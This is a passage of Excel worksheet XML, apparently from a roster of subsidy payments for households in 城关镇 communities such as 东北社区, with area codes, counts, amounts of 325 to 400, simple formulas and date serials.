      <c r="G1112" s="17">
        <v>1</v>
      </c>
      <c r="H1112" s="18">
        <v>365</v>
      </c>
      <c r="I1112" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1112" s="17">
        <v>45383</v>
      </c>
      <c r="K1112" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1113" customHeight="1" spans="1:11">
      <c r="A1113" s="16" t="s">
        <v>2974</v>
      </c>
      <c r="B1113" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1113" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1113" s="17" t="s">
        <v>2975</v>
      </c>
      <c r="E1113" s="17" t="s">
        <v>2976</v>
      </c>
      <c r="F1113" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1113" s="17">
        <v>1</v>
      </c>
      <c r="H1113" s="18">
        <v>365</v>
      </c>
      <c r="I1113" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1113" s="17">
        <v>45383</v>
      </c>
      <c r="K1113" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1114" customHeight="1" spans="1:11">
      <c r="A1114" s="16" t="s">
        <v>2977</v>
      </c>
      <c r="B1114" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1114" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D1114" s="17" t="s">
        <v>2978</v>
      </c>
      <c r="E1114" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F1114" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1114" s="17">
        <v>1</v>
      </c>
      <c r="H1114" s="18">
        <v>365</v>
      </c>
      <c r="I1114" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1114" s="17">
        <v>45200</v>
      </c>
      <c r="K1114" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1115" customHeight="1" spans="1:11">
      <c r="A1115" s="16" t="s">
        <v>2979</v>
      </c>
      <c r="B1115" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1115" s="17" t="s">
        <v>2980</v>
      </c>
      <c r="D1115" s="17" t="s">
        <v>2981</v>
      </c>
      <c r="E1115" s="17" t="s">
        <v>511</v>
      </c>
      <c r="F1115" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1115" s="17">
        <v>1</v>
      </c>
      <c r="H1115" s="18">
        <v>365</v>
      </c>
      <c r="I1115" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1115" s="17">
        <v>45413</v>
      </c>
      <c r="K1115" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1116" customHeight="1" spans="1:11">
      <c r="A1116" s="16" t="s">
        <v>2982</v>
      </c>
      <c r="B1116" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1116" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D1116" s="17" t="s">
        <v>2983</v>
      </c>
      <c r="E1116" s="17" t="s">
        <v>337</v>
      </c>
      <c r="F1116" s="17">
        <v>4113210103</v>
      </c>
      <c r="G1116" s="17">
        <v>1</v>
      </c>
      <c r="H1116" s="18">
        <v>365</v>
      </c>
      <c r="I1116" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1116" s="17">
        <v>45444</v>
      </c>
      <c r="K1116" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1117" customHeight="1" spans="1:11">
      <c r="A1117" s="16" t="s">
        <v>2984</v>
      </c>
      <c r="B1117" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1117" s="17" t="s">
        <v>2985</v>
      </c>
      <c r="D1117" s="17" t="s">
        <v>2986</v>
      </c>
      <c r="E1117" s="17" t="s">
        <v>295</v>
      </c>
      <c r="F1117" s="17">
        <v>4113210103</v>
      </c>
      <c r="G1117" s="17">
        <v>1</v>
      </c>
      <c r="H1117" s="18">
        <v>365</v>
      </c>
      <c r="I1117" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1117" s="17">
        <v>45444</v>
      </c>
      <c r="K1117" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1118" customHeight="1" spans="1:11">
      <c r="A1118" s="16" t="s">
        <v>2987</v>
      </c>
      <c r="B1118" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1118" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1118" s="17" t="s">
        <v>2988</v>
      </c>
      <c r="E1118" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F1118" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1118" s="17">
        <v>1</v>
      </c>
      <c r="H1118" s="18">
        <v>365</v>
      </c>
      <c r="I1118" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1118" s="17">
        <v>45444</v>
      </c>
      <c r="K1118" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1119" customHeight="1" spans="1:11">
      <c r="A1119" s="16" t="s">
        <v>2989</v>
      </c>
      <c r="B1119" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1119" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1119" s="17" t="s">
        <v>2990</v>
      </c>
      <c r="E1119" s="17" t="s">
        <v>2991</v>
      </c>
      <c r="F1119" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1119" s="17">
        <v>1</v>
      </c>
      <c r="H1119" s="18">
        <v>365</v>
      </c>
      <c r="I1119" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1119" s="17">
        <v>45444</v>
      </c>
      <c r="K1119" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1120" customHeight="1" spans="1:11">
      <c r="A1120" s="16" t="s">
        <v>2992</v>
      </c>
      <c r="B1120" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1120" s="17" t="s">
        <v>2045</v>
      </c>
      <c r="D1120" s="17" t="s">
        <v>2993</v>
      </c>
      <c r="E1120" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F1120" s="17">
        <v>4113210107</v>
      </c>
      <c r="G1120" s="17">
        <v>1</v>
      </c>
      <c r="H1120" s="18">
        <v>365</v>
      </c>
      <c r="I1120" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1120" s="17">
        <v>45444</v>
      </c>
      <c r="K1120" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1121" customHeight="1" spans="1:11">
      <c r="A1121" s="16" t="s">
        <v>2994</v>
      </c>
      <c r="B1121" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1121" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D1121" s="17" t="s">
        <v>2995</v>
      </c>
      <c r="E1121" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F1121" s="20">
        <v>4113210106</v>
      </c>
      <c r="G1121" s="17">
        <v>1</v>
      </c>
      <c r="H1121" s="18">
        <v>365</v>
      </c>
      <c r="I1121" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1121" s="29">
        <v>45108</v>
      </c>
      <c r="K1121" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1122" customHeight="1" spans="1:11">
      <c r="A1122" s="16" t="s">
        <v>2996</v>
      </c>
      <c r="B1122" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1122" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D1122" s="17" t="s">
        <v>2997</v>
      </c>
      <c r="E1122" s="17" t="s">
        <v>2998</v>
      </c>
      <c r="F1122" s="31">
        <v>4113210103</v>
      </c>
      <c r="G1122" s="17">
        <v>1</v>
      </c>
      <c r="H1122" s="18">
        <v>365</v>
      </c>
      <c r="I1122" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1122" s="29">
        <v>45108</v>
      </c>
      <c r="K1122" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1123" customHeight="1" spans="1:11">
      <c r="A1123" s="16" t="s">
        <v>2999</v>
      </c>
      <c r="B1123" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1123" s="20" t="s">
        <v>2045</v>
      </c>
      <c r="D1123" s="20" t="s">
        <v>3000</v>
      </c>
      <c r="E1123" s="32" t="s">
        <v>265</v>
      </c>
      <c r="F1123" s="27">
        <v>4113210102</v>
      </c>
      <c r="G1123" s="17">
        <v>1</v>
      </c>
      <c r="H1123" s="18">
        <v>365</v>
      </c>
      <c r="I1123" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1123" s="29">
        <v>45108</v>
      </c>
      <c r="K1123" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1124" customHeight="1" spans="1:11">
      <c r="A1124" s="16" t="s">
        <v>3001</v>
      </c>
      <c r="B1124" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1124" s="33" t="s">
        <v>3002</v>
      </c>
      <c r="D1124" s="33" t="s">
        <v>3003</v>
      </c>
      <c r="E1124" s="22" t="s">
        <v>3004</v>
      </c>
      <c r="F1124" s="20">
        <v>4113210102</v>
      </c>
      <c r="G1124" s="17">
        <v>1</v>
      </c>
      <c r="H1124" s="18">
        <v>365</v>
      </c>
      <c r="I1124" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1124" s="29">
        <v>45505</v>
      </c>
      <c r="K1124" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1125" customHeight="1" spans="1:11">
      <c r="A1125" s="16" t="s">
        <v>3005</v>
      </c>
      <c r="B1125" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1125" s="20" t="s">
        <v>2057</v>
      </c>
      <c r="D1125" s="20" t="s">
        <v>3006</v>
      </c>
      <c r="E1125" s="32" t="s">
        <v>3007</v>
      </c>
      <c r="F1125" s="20">
        <v>4113210102</v>
      </c>
      <c r="G1125" s="17">
        <v>1</v>
      </c>
      <c r="H1125" s="18">
        <v>365</v>
      </c>
      <c r="I1125" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1125" s="29">
        <v>45505</v>
      </c>
      <c r="K1125" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1126" customHeight="1" spans="1:11">
      <c r="A1126" s="16" t="s">
        <v>3008</v>
      </c>
      <c r="B1126" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1126" s="20" t="s">
        <v>2037</v>
      </c>
      <c r="D1126" s="20" t="s">
        <v>3009</v>
      </c>
      <c r="E1126" s="32" t="s">
        <v>288</v>
      </c>
      <c r="F1126" s="26">
        <v>4113210108</v>
      </c>
      <c r="G1126" s="17">
        <v>1</v>
      </c>
      <c r="H1126" s="18">
        <v>365</v>
      </c>
      <c r="I1126" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1126" s="29">
        <v>45536</v>
      </c>
      <c r="K1126" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1127" customHeight="1" spans="1:11">
      <c r="A1127" s="16" t="s">
        <v>3010</v>
      </c>
      <c r="B1127" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1127" s="20" t="s">
        <v>2915</v>
      </c>
      <c r="D1127" s="20" t="s">
        <v>3011</v>
      </c>
      <c r="E1127" s="32" t="s">
        <v>1265</v>
      </c>
      <c r="F1127" s="26">
        <v>4113210108</v>
      </c>
      <c r="G1127" s="17">
        <v>1</v>
      </c>
      <c r="H1127" s="18">
        <v>365</v>
      </c>
      <c r="I1127" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1127" s="29">
        <v>45536</v>
      </c>
      <c r="K1127" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1128" customHeight="1" spans="1:11">
      <c r="A1128" s="16" t="s">
        <v>3012</v>
      </c>
      <c r="B1128" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1128" s="20" t="s">
        <v>3013</v>
      </c>
      <c r="D1128" s="20" t="s">
        <v>3014</v>
      </c>
      <c r="E1128" s="32" t="s">
        <v>3015</v>
      </c>
      <c r="F1128" s="26">
        <v>4113210108</v>
      </c>
      <c r="G1128" s="17">
        <v>2</v>
      </c>
      <c r="H1128" s="18">
        <v>325</v>
      </c>
      <c r="I1128" s="17">
        <f t="shared" si="56"/>
        <v>650</v>
      </c>
      <c r="J1128" s="29">
        <v>45536</v>
      </c>
      <c r="K1128" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1129" customHeight="1" spans="1:11">
      <c r="A1129" s="16" t="s">
        <v>3016</v>
      </c>
      <c r="B1129" s="17" t="str">
        <f>B1128</f>
        <v>城关镇</v>
      </c>
      <c r="C1129" s="20" t="str">
        <f>C1128</f>
        <v>商务局（中华办理）</v>
      </c>
      <c r="D1129" s="19" t="s">
        <v>3017</v>
      </c>
      <c r="E1129" s="19" t="s">
        <v>1155</v>
      </c>
      <c r="F1129" s="26">
        <f>F1128</f>
        <v>4113210108</v>
      </c>
      <c r="G1129" s="17"/>
      <c r="H1129" s="17"/>
      <c r="I1129" s="17"/>
      <c r="J1129" s="29"/>
      <c r="K1129" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1130" customHeight="1" spans="1:11">
      <c r="A1130" s="16" t="s">
        <v>3018</v>
      </c>
      <c r="B1130" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1130" s="20" t="s">
        <v>2057</v>
      </c>
      <c r="D1130" s="20" t="s">
        <v>3019</v>
      </c>
      <c r="E1130" s="32" t="s">
        <v>331</v>
      </c>
      <c r="F1130" s="26" t="s">
        <v>266</v>
      </c>
      <c r="G1130" s="17">
        <v>1</v>
      </c>
      <c r="H1130" s="18">
        <v>365</v>
      </c>
      <c r="I1130" s="17">
        <f t="shared" ref="I1130:I1138" si="57">H1130*G1130</f>
        <v>365</v>
      </c>
      <c r="J1130" s="29">
        <v>45536</v>
      </c>
      <c r="K1130" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1131" customHeight="1" spans="1:11">
      <c r="A1131" s="16" t="s">
        <v>3020</v>
      </c>
      <c r="B1131" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1131" s="20" t="s">
        <v>2057</v>
      </c>
      <c r="D1131" s="20" t="s">
        <v>3021</v>
      </c>
      <c r="E1131" s="32" t="s">
        <v>630</v>
      </c>
      <c r="F1131" s="26" t="s">
        <v>266</v>
      </c>
      <c r="G1131" s="17">
        <v>1</v>
      </c>
      <c r="H1131" s="18">
        <v>365</v>
      </c>
      <c r="I1131" s="17">
        <f t="shared" si="57"/>
        <v>365</v>
      </c>
      <c r="J1131" s="29">
        <v>45536</v>
      </c>
      <c r="K1131" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1132" customHeight="1" spans="1:11">
      <c r="A1132" s="16" t="s">
        <v>3022</v>
      </c>
      <c r="B1132" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1132" s="20" t="s">
        <v>3023</v>
      </c>
      <c r="D1132" s="20" t="s">
        <v>3024</v>
      </c>
      <c r="E1132" s="32" t="s">
        <v>3025</v>
      </c>
      <c r="F1132" s="20" t="s">
        <v>233</v>
      </c>
      <c r="G1132" s="17">
        <v>1</v>
      </c>
      <c r="H1132" s="18">
        <v>365</v>
      </c>
      <c r="I1132" s="17">
        <f t="shared" si="57"/>
        <v>365</v>
      </c>
      <c r="J1132" s="29">
        <v>45505</v>
      </c>
      <c r="K1132" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1133" customHeight="1" spans="1:11">
      <c r="A1133" s="16" t="s">
        <v>3026</v>
      </c>
      <c r="B1133" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1133" s="33" t="s">
        <v>2037</v>
      </c>
      <c r="D1133" s="32" t="s">
        <v>3027</v>
      </c>
      <c r="E1133" s="22" t="s">
        <v>526</v>
      </c>
      <c r="F1133" s="34">
        <v>4113210108</v>
      </c>
      <c r="G1133" s="17">
        <v>1</v>
      </c>
      <c r="H1133" s="18">
        <v>365</v>
      </c>
      <c r="I1133" s="17">
        <f t="shared" si="57"/>
        <v>365</v>
      </c>
      <c r="J1133" s="29">
        <v>45566</v>
      </c>
      <c r="K1133" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1134" customHeight="1" spans="1:11">
      <c r="A1134" s="16" t="s">
        <v>3028</v>
      </c>
      <c r="B1134" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1134" s="20" t="s">
        <v>2057</v>
      </c>
      <c r="D1134" s="20" t="s">
        <v>3029</v>
      </c>
      <c r="E1134" s="22" t="s">
        <v>955</v>
      </c>
      <c r="F1134" s="20">
        <v>4113210106</v>
      </c>
      <c r="G1134" s="17">
        <v>1</v>
      </c>
      <c r="H1134" s="18">
        <v>365</v>
      </c>
      <c r="I1134" s="17">
        <f t="shared" si="57"/>
        <v>365</v>
      </c>
      <c r="J1134" s="29">
        <v>45566</v>
      </c>
      <c r="K1134" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1135" customHeight="1" spans="1:11">
      <c r="A1135" s="16" t="s">
        <v>3030</v>
      </c>
      <c r="B1135" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1135" s="20" t="s">
        <v>3031</v>
      </c>
      <c r="D1135" s="20" t="s">
        <v>3032</v>
      </c>
      <c r="E1135" s="32" t="s">
        <v>3033</v>
      </c>
      <c r="F1135" s="17">
        <v>4113210105</v>
      </c>
      <c r="G1135" s="17">
        <v>1</v>
      </c>
      <c r="H1135" s="18">
        <v>365</v>
      </c>
      <c r="I1135" s="17">
        <f t="shared" si="57"/>
        <v>365</v>
      </c>
      <c r="J1135" s="29">
        <v>45566</v>
      </c>
      <c r="K1135" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1136" customHeight="1" spans="1:11">
      <c r="A1136" s="16" t="s">
        <v>3034</v>
      </c>
      <c r="B1136" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1136" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D1136" s="20" t="s">
        <v>3035</v>
      </c>
      <c r="E1136" s="20" t="s">
        <v>3036</v>
      </c>
      <c r="F1136" s="17">
        <v>4113210103</v>
      </c>
      <c r="G1136" s="17">
        <v>1</v>
      </c>
      <c r="H1136" s="18">
        <v>365</v>
      </c>
      <c r="I1136" s="17">
        <f t="shared" si="57"/>
        <v>365</v>
      </c>
      <c r="J1136" s="29">
        <v>45566</v>
      </c>
      <c r="K1136" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1137" customHeight="1" spans="1:11">
      <c r="A1137" s="16" t="s">
        <v>3037</v>
      </c>
      <c r="B1137" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1137" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D1137" s="20" t="s">
        <v>3038</v>
      </c>
      <c r="E1137" s="20" t="s">
        <v>1226</v>
      </c>
      <c r="F1137" s="17">
        <v>4113210103</v>
      </c>
      <c r="G1137" s="17">
        <v>1</v>
      </c>
      <c r="H1137" s="18">
        <v>365</v>
      </c>
      <c r="I1137" s="17">
        <f t="shared" si="57"/>
        <v>365</v>
      </c>
      <c r="J1137" s="29">
        <v>45597</v>
      </c>
      <c r="K1137" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1138" customHeight="1" spans="1:11">
      <c r="A1138" s="16" t="s">
        <v>3039</v>
      </c>
      <c r="B1138" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1138" s="20" t="s">
        <v>2040</v>
      </c>
      <c r="D1138" s="20" t="s">
        <v>3040</v>
      </c>
      <c r="E1138" s="20" t="s">
        <v>3041</v>
      </c>
      <c r="F1138" s="17">
        <v>4113210103</v>
      </c>
      <c r="G1138" s="17">
        <v>2</v>
      </c>
      <c r="H1138" s="18">
        <v>325</v>
      </c>
      <c r="I1138" s="17">
        <f t="shared" si="57"/>
        <v>650</v>
      </c>
      <c r="J1138" s="29">
        <v>45597</v>
      </c>
      <c r="K1138" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1139" customHeight="1" spans="1:11">
      <c r="A1139" s="16" t="s">
        <v>3042</v>
      </c>
      <c r="B1139" s="17" t="str">
        <f>B1138</f>
        <v>城关镇</v>
      </c>
      <c r="C1139" s="17" t="str">
        <f>C1138</f>
        <v>东北社区</v>
      </c>
      <c r="D1139" s="19" t="s">
        <v>3043</v>
      </c>
      <c r="E1139" s="19" t="s">
        <v>3044</v>
      </c>
      <c r="F1139" s="17">
        <f>F1138</f>
        <v>4113210103</v>
      </c>
      <c r="G1139" s="17"/>
      <c r="H1139" s="17"/>
      <c r="I1139" s="17"/>
      <c r="J1139" s="29"/>
      <c r="K1139" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1140" customHeight="1" spans="1:11">
      <c r="A1140" s="16" t="s">
        <v>3045</v>
      </c>
      <c r="B1140" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1140" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1140" s="20" t="s">
        <v>3046</v>
      </c>
      <c r="E1140" s="20" t="s">
        <v>966</v>
      </c>
      <c r="F1140" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1140" s="17">
        <v>1</v>
      </c>
      <c r="H1140" s="18">
        <v>365</v>
      </c>
      <c r="I1140" s="17">
        <f>H1140*G1140</f>
        <v>365</v>
      </c>
      <c r="J1140" s="29">
        <v>45597</v>
      </c>
      <c r="K1140" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1141" customHeight="1" spans="1:11">
      <c r="A1141" s="16" t="s">
        <v>3047</v>
      </c>
      <c r="B1141" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1141" s="20" t="s">
        <v>3048</v>
      </c>
      <c r="D1141" s="20" t="s">
        <v>3049</v>
      </c>
      <c r="E1141" s="20" t="s">
        <v>288</v>
      </c>
      <c r="F1141" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1141" s="17">
        <v>1</v>
      </c>
      <c r="H1141" s="18">
        <v>365</v>
      </c>
      <c r="I1141" s="17">
        <f>H1141*G1141</f>
        <v>365</v>
      </c>
      <c r="J1141" s="29">
        <v>45597</v>
      </c>
      <c r="K1141" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1142" customHeight="1" spans="1:11">
      <c r="A1142" s="16" t="s">
        <v>3050</v>
      </c>
      <c r="B1142" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1142" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D1142" s="17" t="s">
        <v>3051</v>
      </c>
      <c r="E1142" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F1142" s="17">
        <v>4113210103</v>
      </c>
      <c r="G1142" s="17">
        <v>1</v>
      </c>
      <c r="H1142" s="18">
        <v>365</v>
      </c>
      <c r="I1142" s="17">
        <f>H1142*G1142</f>
        <v>365</v>
      </c>
      <c r="J1142" s="29">
        <v>45627</v>
      </c>
      <c r="K1142" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1143" customHeight="1" spans="1:11">
      <c r="A1143" s="16" t="s">
        <v>3052</v>
      </c>
      <c r="B1143" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1143" s="17" t="s">
        <v>2045</v>
      </c>
      <c r="D1143" s="17" t="s">
        <v>3053</v>
      </c>
      <c r="E1143" s="17" t="s">
        <v>521</v>
      </c>
      <c r="F1143" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1143" s="17">
        <v>1</v>
      </c>
      <c r="H1143" s="18">
        <v>365</v>
      </c>
      <c r="I1143" s="17">
        <f t="shared" ref="I1143:I1150" si="58">H1143*G1143</f>
        <v>365</v>
      </c>
      <c r="J1143" s="29">
        <v>45658</v>
      </c>
      <c r="K1143" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1144" customHeight="1" spans="1:11">
      <c r="A1144" s="16" t="s">
        <v>3054</v>
      </c>
      <c r="B1144" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1144" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1144" s="17" t="s">
        <v>3055</v>
      </c>
      <c r="E1144" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F1144" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1144" s="17">
        <v>1</v>
      </c>
      <c r="H1144" s="18">
        <v>365</v>
      </c>
      <c r="I1144" s="17">
        <f t="shared" si="58"/>
        <v>365</v>
      </c>
      <c r="J1144" s="29">
        <v>45658</v>
      </c>
      <c r="K1144" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1145" customHeight="1" spans="1:11">
      <c r="A1145" s="16" t="s">
        <v>3056</v>
      </c>
      <c r="B1145" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1145" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1145" s="17" t="s">
        <v>3057</v>
      </c>
      <c r="E1145" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F1145" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1145" s="17">
        <v>1</v>
      </c>
      <c r="H1145" s="18">
        <v>365</v>
      </c>
      <c r="I1145" s="17">
        <f t="shared" si="58"/>
        <v>365</v>
      </c>
      <c r="J1145" s="29">
        <v>45658</v>
      </c>
      <c r="K1145" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1146" customHeight="1" spans="1:11">
      <c r="A1146" s="16" t="s">
        <v>3058</v>
      </c>
      <c r="B1146" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1146" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1146" s="17" t="s">
        <v>3059</v>
      </c>
      <c r="E1146" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F1146" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1146" s="17">
        <v>1</v>
      </c>
      <c r="H1146" s="18">
        <v>365</v>
      </c>
      <c r="I1146" s="17">
        <f t="shared" si="58"/>
        <v>365</v>
      </c>
      <c r="J1146" s="29">
        <v>45658</v>
      </c>
      <c r="K1146" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1147" customHeight="1" spans="1:11">
      <c r="A1147" s="16" t="s">
        <v>3060</v>
      </c>
      <c r="B1147" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1147" s="17" t="s">
        <v>3061</v>
      </c>
      <c r="D1147" s="17" t="s">
        <v>3062</v>
      </c>
      <c r="E1147" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F1147" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1147" s="17">
        <v>1</v>
      </c>
      <c r="H1147" s="18">
        <v>400</v>
      </c>
      <c r="I1147" s="17">
        <f t="shared" si="58"/>
        <v>400</v>
      </c>
      <c r="J1147" s="29">
        <v>45658</v>
      </c>
      <c r="K1147" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1148" customHeight="1" spans="1:11">
      <c r="A1148" s="16" t="s">
        <v>3063</v>
      </c>
      <c r="B1148" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1148" s="17" t="s">
        <v>3064</v>
      </c>
      <c r="D1148" s="17" t="s">
        <v>3065</v>
      </c>
      <c r="E1148" s="17" t="s">
        <v>1694</v>
      </c>
      <c r="F1148" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1148" s="17">
        <v>1</v>
      </c>
      <c r="H1148" s="18">
        <v>365</v>
      </c>
      <c r="I1148" s="17">
        <f t="shared" si="58"/>
        <v>365</v>
      </c>
      <c r="J1148" s="29">
        <v>45658</v>
      </c>
      <c r="K1148" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1149" customHeight="1" spans="1:11">
      <c r="A1149" s="16" t="s">
        <v>3066</v>
      </c>
      <c r="B1149" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1149" s="20" t="s">
        <v>2037</v>
      </c>
      <c r="D1149" s="20" t="s">
        <v>3067</v>
      </c>
      <c r="E1149" s="20" t="s">
        <v>3068</v>
      </c>
      <c r="F1149" s="17">
        <v>4113210106</v>
      </c>
      <c r="G1149" s="17">
        <v>1</v>
      </c>
      <c r="H1149" s="18">
        <v>365</v>
      </c>
      <c r="I1149" s="17">
        <f t="shared" si="58"/>
        <v>365</v>
      </c>
      <c r="J1149" s="29">
        <v>45627</v>
      </c>
      <c r="K1149" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1150" customHeight="1" spans="1:11">
      <c r="A1150" s="16" t="s">
        <v>3069</v>
      </c>
      <c r="B1150" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1150" s="20" t="s">
        <v>2040</v>
      </c>
      <c r="D1150" s="20" t="s">
        <v>3070</v>
      </c>
      <c r="E1150" s="20" t="s">
        <v>340</v>
      </c>
      <c r="F1150" s="35">
        <v>4113210103</v>
      </c>
      <c r="G1150" s="17">
        <v>2</v>
      </c>
      <c r="H1150" s="18">
        <v>325</v>
      </c>
      <c r="I1150" s="17">
        <f t="shared" si="58"/>
        <v>650</v>
      </c>
      <c r="J1150" s="29">
        <v>45689</v>
      </c>
      <c r="K1150" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1151" customHeight="1" spans="1:11">
      <c r="A1151" s="16" t="s">
        <v>3071</v>
      </c>
      <c r="B1151" s="17" t="str">
        <f>B1150</f>
        <v>城关镇</v>
      </c>
      <c r="C1151" s="20" t="str">
        <f>C1150</f>
        <v>东北社区</v>
      </c>
      <c r="D1151" s="19" t="s">
        <v>3072</v>
      </c>
      <c r="E1151" s="19" t="s">
        <v>1676</v>
      </c>
      <c r="F1151" s="17">
        <f>F1150</f>
        <v>4113210103</v>
      </c>
      <c r="G1151" s="17"/>
      <c r="H1151" s="17"/>
